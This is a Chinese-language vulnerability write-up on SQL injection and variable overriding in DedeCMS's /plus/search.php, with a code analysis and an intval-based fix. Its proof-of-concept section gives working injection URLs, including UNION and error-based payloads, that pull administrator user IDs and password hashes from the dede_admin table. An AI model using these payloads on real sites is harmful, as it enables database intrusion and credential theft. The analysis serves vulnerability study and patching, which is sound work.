dedecms /plus/search.php SQL Injection && Local Variable Overriding

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

这个文件有两处注入漏洞

1. $typeid变量覆盖导致ChannelTypeid被强制改变: 低风险
2. $typeArr的本地变量覆盖注入+$typeid变量覆盖导致SQL注入: 高风险

Relevant Link:

http://graysb.diandian.com/post/2013-03-10/40049018798
http://0day5.com/archives/341

2. 漏洞触发条件

0x1: POC1

http://dede/plus/search.php?typeid=1&keyword=test
/*
在请求的时候URL中要带上keyword，因为在search.php中有对keyword的检测
if(($keyword=='' || strlen($keyword)<2) && empty($typeid))
{
    ShowMsg('关键字不能小于2个字节！','-1');
    exit();
}
*/

0x2: POC2

http://localhost/dede/plus/search.php?typeArr[1%201%3d2union%20select%20pwd%20from%20dede_admin]=11&kwtype=0&q=11
//$typeArr的键本身是payload，keyword要和这个键的值相同

0x3: Safe Alert: Request Error step 2 !

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0x4: Safe Alert: Request Error step 1 !

xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

Relevant Link:

http://zone.wooyun.org/content/2414

3. 漏洞影响范围
4. 漏洞代码分析

0x1: $typeid变量覆盖导致ChannelTypeid被强制改变

\plus\search.php

..
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
..
$sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid);
..

\include\arc.searchview.class.php

...
//php5构造函数
function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
{
    global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time;
    if(empty($upagesize))
    {
        $upagesize = 10;
    }
    //直接赋值
    $this->TypeID = $typeid;
    ..
}
..

0x2: $typeArr的本地变量覆盖注入+$typeid变量覆盖导致SQL注入

\plus\search.php

//查找栏目信息
if(empty($typeid))
{
    ...
    //引入栏目缓存并看关键字是否有相关栏目内容
    require_once($typenameCacheFile);
    //黑客通过本地变量覆盖漏洞改变$typeArr变量的值，进入if判断逻辑
    if(isset($typeArr) && is_array($typeArr))
    {
        //1. 遍历这个全局数组$typeArr，从中取出键值对
        foreach($typeArr as $id => $typename)
        {
            /*
            2.    从我们输入的关键字参数$keyword中删除这个全局数组($typeArr)中出现过的值，也就是说，这个$typeArr本来是充当一个敏感关键字的数组的作用
            3.    注意，str_replace()返回的是替换后的数组或者字符串
            4.    如果检测到了我们规定的关键字($typeArr中保存的值)出现在了我们输出的$keyword参数中，就进行过滤并删除
            */
            $keywordn = str_replace($typename, ' ', $keyword);
            if($keyword != $keywordn)
            {
                $keyword = $keywordn;
                //5. 但是在过滤的过程中，却发生了另一个本地变量覆盖，$typeid这个变量会被"直接"带入到后续的SQL查询中
                $typeid = $id;
                break;
            }
        }
    }
}

\include\arc.searchview.class.php

function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
{
        ..
        $this->TypeID = $typeid;
        ...
        else
        {
        //将可能包含黑客注入畸形字符的$this->TypeID直接带入SQL查询
        $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}");
        $this->ChannelTypeid=$row['channeltype'];
        }
    ..
}
..

这种注入是利用了数组的键进行了注入

Relevant Link:

http://www.2cto.com/Article/201301/184105.html

5. 防御方法

\plus\search.php

//查找栏目信息
if(empty($typeid))
{
    ..
    if($keyword != $keywordn)
    {
        $keyword = HtmlReplace($keywordn);
        //对键值$id进行规范化处理
        $typeid = intval($id);
        break;
    }
    ..
}
..
//对$typeid进行规范化处理
$typeid = intval($typeid);
..

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved